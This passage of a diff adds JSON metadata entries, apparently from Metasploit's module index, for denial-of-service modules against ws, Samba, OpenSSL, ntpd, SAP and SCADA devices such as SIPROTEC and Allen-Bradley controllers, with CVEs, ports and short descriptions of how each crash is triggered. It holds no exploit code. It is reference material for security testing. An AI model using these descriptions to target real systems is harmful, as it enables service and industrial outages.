"/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/wordpress_xmlrpc_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/ws_dos": { + "name": "ws - Denial of Service", + "fullname": "auxiliary/dos/http/ws_dos", + "aliases": [], + "rank": 300, + "disclosure_date": 
null, + "type": "auxiliary", + "author": [ + "Ryan Knell, Sonatype Security Research", + "Nick Starke, Sonatype Security Research" + ], + "description": "This module exploits a Denial of Service vulnerability in npm module \"ws\".\n By sending a specially crafted value of the Sec-WebSocket-Extensions header on the initial WebSocket upgrade request, the ws component will crash.", + "references": [ + "URL-https://nodesecurity.io/advisories/550", + "CWE-400" + ], + "platform": "", + "arch": "", + "rport": 3000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/dos/http/ws_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/ws_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/mdns/avahi_portzero": { + "name": "Avahi Source Port 0 DoS", + "fullname": "auxiliary/dos/mdns/avahi_portzero", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-11-14", + "type": "auxiliary", + "author": [ + "kris katterjohn " + ], + "description": "Avahi-daemon versions prior to 0.6.24 can be DoS'd\n with an mDNS packet with a source port of 0.", + "references": [ + "CVE-2008-5081", + "OSVDB-50929" + ], + "platform": "", + "arch": "", + "rport": 5353, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/dos/mdns/avahi_portzero.rb", + "is_install_path": true, + "ref_name": "dos/mdns/avahi_portzero", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/mirageos/qubes_mirage_firewall_dos": { + "name": "Mirage firewall for QubesOS 0.8.0-0.8.3 Denial of Service (DoS) Exploit", + "fullname": "auxiliary/dos/mirageos/qubes_mirage_firewall_dos", + 
"aliases": [], + "rank": 300, + "disclosure_date": "2022-12-04", + "type": "auxiliary", + "author": [ + "Krzysztof Burghardt " + ], + "description": "This module allows remote attackers to cause a denial of service (DoS)\n in Mirage firewall for QubesOS 0.8.0-0.8.3 via a specifically crafted UDP request.", + "references": [ + "CVE-2022-46770", + "URL-https://mirage.io/blog/MSA03", + "URL-https://github.com/mirage/qubes-mirage-firewall/issues/166" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2023-02-05 12:04:59 +0000", + "path": "/modules/auxiliary/dos/mirageos/qubes_mirage_firewall_dos.rb", + "is_install_path": true, + "ref_name": "dos/mirageos/qubes_mirage_firewall_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/misc/dopewars": { + "name": "Dopewars Denial of Service", + "fullname": "auxiliary/dos/misc/dopewars", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-10-05", + "type": "auxiliary", + "author": [ + "Doug Prostko " + ], + "description": "The jet command in Dopewars 1.5.12 is vulnerable to a segmentation fault due to\n a lack of input validation.", + "references": [ + "CVE-2009-3591", + "OSVDB-58884", + "BID-36606" + ], + "platform": "", + "arch": "", + "rport": 7902, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/misc/dopewars.rb", + "is_install_path": true, + "ref_name": "dos/misc/dopewars", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/misc/ibm_sametime_webplayer_dos": { + "name": 
"IBM Lotus Sametime WebPlayer DoS", + "fullname": "auxiliary/dos/misc/ibm_sametime_webplayer_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-11-07", + "type": "auxiliary", + "author": [ + "Chris John Riley", + "kicks4kittens" + ], + "description": "This module exploits a known flaw in the IBM Lotus Sametime WebPlayer\n version 8.5.2.1392 (and prior) to cause a denial of service condition\n against specific users. For this module to function the target user\n must be actively logged into the IBM Lotus Sametime server and have\n the Sametime Audio Visual browser plug-in (WebPlayer) loaded as a\n browser extension. The user should have the WebPlayer plug-in active\n (i.e. be in a Sametime Audio/Video meeting for this DoS to work correctly.", + "references": [ + "CVE-2013-3986", + "OSVDB-99552", + "BID-63611", + "URL-http://www-01.ibm.com/support/docview.wss?uid=swg21654041", + "URL-http://xforce.iss.net/xforce/xfdb/84969" + ], + "platform": "", + "arch": "", + "rport": 5060, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb", + "is_install_path": true, + "ref_name": "dos/misc/ibm_sametime_webplayer_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "CHECK", + "description": "Checking if targeted user is online" + }, + { + "name": "DOS", + "description": "Cause a Denial Of Service condition against a connected user" + } + ] + }, + "auxiliary_dos/misc/ibm_tsm_dos": { + "name": "IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service", + "fullname": "auxiliary/dos/misc/ibm_tsm_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-12-15", + "type": "auxiliary", + "author": [ + "Gianni Gnesa", + "William Webb " + ], + "description": "This module exploits a denial of service 
condition present in IBM Tivoli Storage Manager\n FastBack Server when dealing with packets triggering the opcode 0x534 handler.", + "references": [ + "EDB-38979", + "OSVDB-132307" + ], + "platform": "", + "arch": "", + "rport": 11460, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/misc/ibm_tsm_dos.rb", + "is_install_path": true, + "ref_name": "dos/misc/ibm_tsm_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/misc/memcached": { + "name": "Memcached Remote Denial of Service", + "fullname": "auxiliary/dos/misc/memcached", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Gregory Man " + ], + "description": "This module sends a specially-crafted packet to cause a\n segmentation fault in memcached v1.4.15 or earlier versions.", + "references": [ + "URL-https://code.google.com/archive/p/memcached/issues/192", + "CVE-2011-4971", + "OSVDB-92867" + ], + "platform": "", + "arch": "", + "rport": 11211, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/misc/memcached.rb", + "is_install_path": true, + "ref_name": "dos/misc/memcached", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/ntp/ntpd_reserved_dos": { + "name": "NTP.org ntpd Reserved Mode Denial of Service", + "fullname": "auxiliary/dos/ntp/ntpd_reserved_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-10-04", + "type": "auxiliary", + "author": [ + "todb " + ], + "description": "This module exploits a denial of service vulnerability\n within the NTP (network time protocol) demon. 
By sending\n a single packet to a vulnerable ntpd server (Victim A),\n spoofed from the IP address of another vulnerable ntpd server\n (Victim B), both victims will enter an infinite response loop.\n Note, unless you control the spoofed source host or the real\n remote host(s), you will not be able to halt the DoS condition\n once begun!", + "references": [ + "BID-37255", + "CVE-2009-3563", + "OSVDB-60847", + "URL-https://bugs.ntp.org/show_bug.cgi?id=1331" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb", + "is_install_path": true, + "ref_name": "dos/ntp/ntpd_reserved_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/pptp/ms02_063_pptp_dos": { + "name": "MS02-063 PPTP Malformed Control Data Kernel Denial of Service", + "fullname": "auxiliary/dos/pptp/ms02_063_pptp_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2002-09-26", + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "This module exploits a kernel based overflow when sending abnormal PPTP Control Data\n packets\tto Microsoft Windows 2000 SP0-3 and XP SP0-1 based PPTP RAS servers\n (Remote Access Services). 
Kernel memory is overwritten resulting in a BSOD.\n Code execution may be possible however this module is only a DoS.", + "references": [ + "BID-5807", + "CVE-2002-1214", + "OSVDB-13422", + "MSB-MS02-063" + ], + "platform": "", + "arch": "", + "rport": 1723, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb", + "is_install_path": true, + "ref_name": "dos/pptp/ms02_063_pptp_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/rpc/rpcbomb": { + "name": "RPC DoS targeting *nix rpcbind/libtirpc", + "fullname": "auxiliary/dos/rpc/rpcbomb", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "guidovranken", + "Pearce Barry " + ], + "description": "This module exploits a vulnerability in certain versions of\n rpcbind, LIBTIRPC, and NTIRPC, allowing an attacker to trigger\n large (and never freed) memory allocations for XDR strings on\n the target.", + "references": [ + "CVE-2017-8779", + "BID-98325", + "URL-http://openwall.com/lists/oss-security/2017/05/03/12" + ], + "platform": "", + "arch": "", + "rport": 111, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/dos/rpc/rpcbomb.rb", + "is_install_path": true, + "ref_name": "dos/rpc/rpcbomb", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/samba/lsa_addprivs_heap": { + "name": "Samba lsa_io_privilege_set Heap Overflow", + "fullname": "auxiliary/dos/samba/lsa_addprivs_heap", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This 
module triggers a heap overflow in the LSA RPC service\n of the Samba daemon.", + "references": [ + "CVE-2007-2446", + "OSVDB-34699" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb", + "is_install_path": true, + "ref_name": "dos/samba/lsa_addprivs_heap", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/samba/lsa_transnames_heap": { + "name": "Samba lsa_io_trans_names Heap Overflow", + "fullname": "auxiliary/dos/samba/lsa_transnames_heap", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module triggers a heap overflow in the LSA RPC service\n of the Samba daemon.", + "references": [ + "CVE-2007-2446", + "OSVDB-34699" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/dos/samba/lsa_transnames_heap.rb", + "is_install_path": true, + "ref_name": "dos/samba/lsa_transnames_heap", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/samba/read_nttrans_ea_list": { + "name": "Samba read_nttrans_ea_list Integer Overflow", + "fullname": "auxiliary/dos/samba/read_nttrans_ea_list", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Jeremy Allison", + "dz_lnly" + ], + "description": "Integer overflow in the read_nttrans_ea_list function in nttrans.c in\n smbd in Samba 3.x 
before 3.5.22, 3.6.x before 3.6.17, and 4.x before\n 4.0.8 allows remote attackers to cause a denial of service (memory\n consumption) via a malformed packet. Important Note: in order to work,\n the \"ea support\" option on the target share must be enabled.", + "references": [ + "OSVDB-95969", + "BID-61597", + "EDB-27778", + "CVE-2013-4124" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2021-01-28 10:35:25 +0000", + "path": "/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb", + "is_install_path": true, + "ref_name": "dos/samba/read_nttrans_ea_list", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/sap/sap_soap_rfc_eps_delete_file": { + "name": "SAP SOAP EPS_DELETE_FILE File Deletion", + "fullname": "auxiliary/dos/sap/sap_soap_rfc_eps_delete_file", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Alexey Sintsov", + "nmonkee" + ], + "description": "This module abuses the SAP NetWeaver EPS_DELETE_FILE function, on the SAP SOAP\n RFC Service, to delete arbitrary files on the remote file system. 
The module can\n also be used to capture SMB hashes by using a fake SMB share as DIRNAME.", + "references": [ + "OSVDB-74780", + "URL-http://dsecrg.com/pages/vul/show.php?id=331", + "URL-https://launchpad.support.sap.com/#/notes/1554030" + ], + "platform": "", + "arch": "", + "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb", + "is_install_path": true, + "ref_name": "dos/sap/sap_soap_rfc_eps_delete_file", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/scada/allen_bradley_pccc": { + "name": "DoS Exploitation of Allen-Bradley's Legacy Protocol (PCCC)", + "fullname": "auxiliary/dos/scada/allen_bradley_pccc", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "José Diogo Monteiro ", + "Luis Rosa ", + "Miguel Borges de Freitas " + ], + "description": "A remote, unauthenticated attacker could send a single, specially crafted\n Programmable Controller Communication Commands (PCCC) packet to the controller\n that could potentially cause the controller to enter a DoS condition.\n MicroLogix 1100 controllers are affected: 1763-L16BWA, 1763-L16AWA, 1763-L16BBB, and\n 1763-L16DWD.\n CVE-2017-7924 has been assigned to this vulnerability.\n A CVSS v3 base score of 7.5 has been assigned.", + "references": [ + "CVE-2017-7924", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-17-138-03", + "URL-http://web.archive.org/web/20250116210051/https://dl.acm.org/doi/10.1145/3174776.3174780" + ], + "platform": "", + "arch": "", + "rport": 44818, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": 
"/modules/auxiliary/dos/scada/allen_bradley_pccc.rb", + "is_install_path": true, + "ref_name": "dos/scada/allen_bradley_pccc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/scada/beckhoff_twincat": { + "name": "Beckhoff TwinCAT SCADA PLC 2.11.0.2004 DoS", + "fullname": "auxiliary/dos/scada/beckhoff_twincat", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-09-13", + "type": "auxiliary", + "author": [ + "Luigi Auriemma", + "jfa" + ], + "description": "The Beckhoff TwinCAT version <= 2.11.0.2004 can be brought down by sending\n a crafted UDP packet to port 48899 (TCATSysSrv.exe).", + "references": [ + "CVE-2011-3486", + "OSVDB-75495", + "URL-http://aluigi.altervista.org/adv/twincat_1-adv.txt" + ], + "platform": "", + "arch": "", + "rport": 48899, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/scada/beckhoff_twincat.rb", + "is_install_path": true, + "ref_name": "dos/scada/beckhoff_twincat", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/scada/d20_tftp_overflow": { + "name": "General Electric D20ME TFTP Server Buffer Overflow DoS", + "fullname": "auxiliary/dos/scada/d20_tftp_overflow", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-01-19", + "type": "auxiliary", + "author": [ + "K. 
Reid Wightman ", + "todb " + ], + "description": "By sending a malformed TFTP request to the GE D20ME, it is possible to crash the\n device.\n\n This module is based on the original 'd20ftpbo.rb' Basecamp module from\n DigitalBond.", + "references": [ + "URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/" + ], + "platform": "", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2021-01-28 10:35:25 +0000", + "path": "/modules/auxiliary/dos/scada/d20_tftp_overflow.rb", + "is_install_path": true, + "ref_name": "dos/scada/d20_tftp_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/scada/igss9_dataserver": { + "name": "7-Technologies IGSS 9 IGSSdataServer.exe DoS", + "fullname": "auxiliary/dos/scada/igss9_dataserver", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-12-20", + "type": "auxiliary", + "author": [ + "jfa" + ], + "description": "The 7-Technologies SCADA IGSS Data Server (IGSSdataServer.exe) <= 9.0.0.10306 can be\n brought down by sending a crafted TCP packet to port 12401. 
This should also work\n for version <= 9.0.0.1120, but that version hasn't been tested.", + "references": [ + "CVE-2011-4050", + "OSVDB-77976", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-335-01" + ], + "platform": "", + "arch": "", + "rport": 12401, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/scada/igss9_dataserver.rb", + "is_install_path": true, + "ref_name": "dos/scada/igss9_dataserver", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/scada/siemens_siprotec4": { + "name": "Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module - Denial of Service", + "fullname": "auxiliary/dos/scada/siemens_siprotec4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "M. Can Kurnaz" + ], + "description": "This module sends a specially crafted packet to port 50000/UDP\n causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) devices.\n A manual reboot is required to return the device to service.\n CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.", + "references": [ + "EDB-44103", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-15-202-01" + ], + "platform": "", + "arch": "", + "rport": 50000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/scada/siemens_siprotec4.rb", + "is_install_path": true, + "ref_name": "dos/scada/siemens_siprotec4", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/scada/yokogawa_logsvr": { + "name": "Yokogawa CENTUM CS 3000 BKCLogSvr.exe Heap Buffer 
Overflow", + "fullname": "auxiliary/dos/scada/yokogawa_logsvr", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-03-10", + "type": "auxiliary", + "author": [ + "juan vazquez ", + "Redsadic " + ], + "description": "This module abuses a buffer overflow vulnerability to trigger a Denial of Service\n of the BKCLogSvr component in the Yokogaca CENTUM CS 3000 product. The vulnerability\n exists in the handling of malformed log packets, with an unexpected long level field.\n The root cause of the vulnerability is a combination of usage of uninitialized memory\n from the stack and a dangerous string copy. This module has been tested successfully\n on Yokogawa CENTUM CS 3000 R3.08.50.", + "references": [ + "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf", + "URL-http://web.archive.org/web/20221209030848/https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities/", + "CVE-2014-0781" + ], + "platform": "", + "arch": "", + "rport": 52302, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/dos/scada/yokogawa_logsvr.rb", + "is_install_path": true, + "ref_name": "dos/scada/yokogawa_logsvr", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/smb/smb_loris": { + "name": "SMBLoris NBSS Denial of Service", + "fullname": "auxiliary/dos/smb/smb_loris", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-06-29", + "type": "auxiliary", + "author": [ + "thelightcosine", + "Adam Cammack " + ], + "description": "The SMBLoris attack consumes large chunks of memory in the target by sending\n SMB requests with the NetBios Session Service(NBSS) Length Header value set\n to the maximum possible value. 
By keeping these connections open and initiating\n large numbers of these sessions, the memory does not get freed, and the server\n grinds to a halt. This vulnerability was originally disclosed by Sean Dillon\n and Zach Harding.\n\n DISCALIMER: This module opens a lot of simultaneous connections. Please check\n your system's ULIMIT to make sure it can handle it. This module will also run\n continuously until stopped.", + "references": [ + "URL-https://web.archive.org/web/20170804072329/https://smbloris.com/", + "AKA-SMBLoris" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/smb/smb_loris.rb", + "is_install_path": true, + "ref_name": "dos/smb/smb_loris", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/smtp/sendmail_prescan": { + "name": "Sendmail SMTP Address prescan Memory Corruption", + "fullname": "auxiliary/dos/smtp/sendmail_prescan", + "aliases": [], + "rank": 300, + "disclosure_date": "2003-09-17", + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "This is a proof of concept denial of service module for Sendmail versions\n 8.12.8 and earlier. The vulnerability is within the prescan() method when\n parsing SMTP headers. 
Due to the prescan function, only 0x5c and 0x00\n bytes can be used, limiting the likelihood for arbitrary code execution.", + "references": [ + "OSVDB-2577", + "CVE-2003-0694", + "BID-8641", + "EDB-24" + ], + "platform": "", + "arch": "", + "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], + "targets": null, + "mod_time": "2023-01-04 14:45:58 +0000", + "path": "/modules/auxiliary/dos/smtp/sendmail_prescan.rb", + "is_install_path": true, + "ref_name": "dos/smtp/sendmail_prescan", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/solaris/lpd/cascade_delete": { + "name": "Solaris LPD Arbitrary File Delete", + "fullname": "auxiliary/dos/solaris/lpd/cascade_delete", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm ", + "Optyx " + ], + "description": "This module uses a vulnerability in the Solaris line printer\n daemon to delete arbitrary files on an affected system. This\n can be used to exploit the rpc.walld format string flaw, the\n missing krb5.conf authentication bypass, or simply delete\n system files. 
Tested on Solaris 2.6, 7, 8, 9, and 10.", + "references": [ + "CVE-2005-4797", + "BID-14510", + "OSVDB-18650" + ], + "platform": "", + "arch": "", + "rport": 515, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb", + "is_install_path": true, + "ref_name": "dos/solaris/lpd/cascade_delete", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/ssl/dtls_changecipherspec": { + "name": "OpenSSL DTLS ChangeCipherSpec Remote DoS", + "fullname": "auxiliary/dos/ssl/dtls_changecipherspec", + "aliases": [], + "rank": 300, + "disclosure_date": "2000-04-26", + "type": "auxiliary", + "author": [ + "Jon Oberheide ", + "theLightCosine " + ], + "description": "This module performs a Denial of Service Attack against Datagram TLS in OpenSSL\n version 0.9.8i and earlier. 
OpenSSL crashes under these versions when it receives a\n ChangeCipherspec Datagram before a ClientHello.", + "references": [ + "CVE-2009-1386", + "OSVDB-55073" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb", + "is_install_path": true, + "ref_name": "dos/ssl/dtls_changecipherspec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/ssl/dtls_fragment_overflow": { + "name": "OpenSSL DTLS Fragment Buffer Overflow DoS", + "fullname": "auxiliary/dos/ssl/dtls_fragment_overflow", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-06-05", + "type": "auxiliary", + "author": [ + "Juri Aedla ", + "Jon Hart " + ], + "description": "This module performs a Denial of Service Attack against Datagram TLS in\n OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h.\n This occurs when a DTLS ClientHello message has multiple fragments and the\n fragment lengths of later fragments are larger than that of the first, a\n buffer overflow occurs, causing a DoS.", + "references": [ + "CVE-2014-0195", + "ZDI-14-173", + "BID-67900", + "URL-http://web.archive.org/web/20150815024234/http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/ZDI-14-173-CVE-2014-0195-OpenSSL-DTLS-Fragment-Out-of-Bounds/ba-p/6501002", + "URL-http://web.archive.org/web/20140707160621/http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Once-Bled-Twice-Shy-OpenSSL-CVE-2014-0195/ba-p/6501048" + ], + "platform": "", + "arch": "", + "rport": 4433, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb", + "is_install_path": true, + "ref_name": 
"dos/ssl/dtls_fragment_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/ssl/openssl_aesni": { + "name": "OpenSSL TLS 1.1 and 1.2 AES-NI DoS", + "fullname": "auxiliary/dos/ssl/openssl_aesni", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-02-05", + "type": "auxiliary", + "author": [ + "Wolfgang Ettlinger " + ], + "description": "The AES-NI implementation of OpenSSL 1.0.1c does not properly compute the\n length of an encrypted message when used with a TLS version 1.1 or above. This\n leads to an integer underflow which can cause a DoS. The vulnerable function\n aesni_cbc_hmac_sha1_cipher is only included in the 64-bit versions of OpenSSL.\n This module has been tested successfully on Ubuntu 12.04 (64-bit) with the default\n OpenSSL 1.0.1c package.", + "references": [ + "CVE-2012-2686", + "URL-https://www.openssl.org/news/secadv/20130205.txt" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/dos/ssl/openssl_aesni.rb", + "is_install_path": true, + "ref_name": "dos/ssl/openssl_aesni", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/syslog/rsyslog_long_tag": { + "name": "rsyslog Long Tag Off-By-Two DoS", + "fullname": "auxiliary/dos/syslog/rsyslog_long_tag", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-09-01", + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module triggers an off-by-two overflow in the\n rsyslog daemon. This flaw is unlikely to yield code execution\n but is effective at shutting down a remote log daemon. 
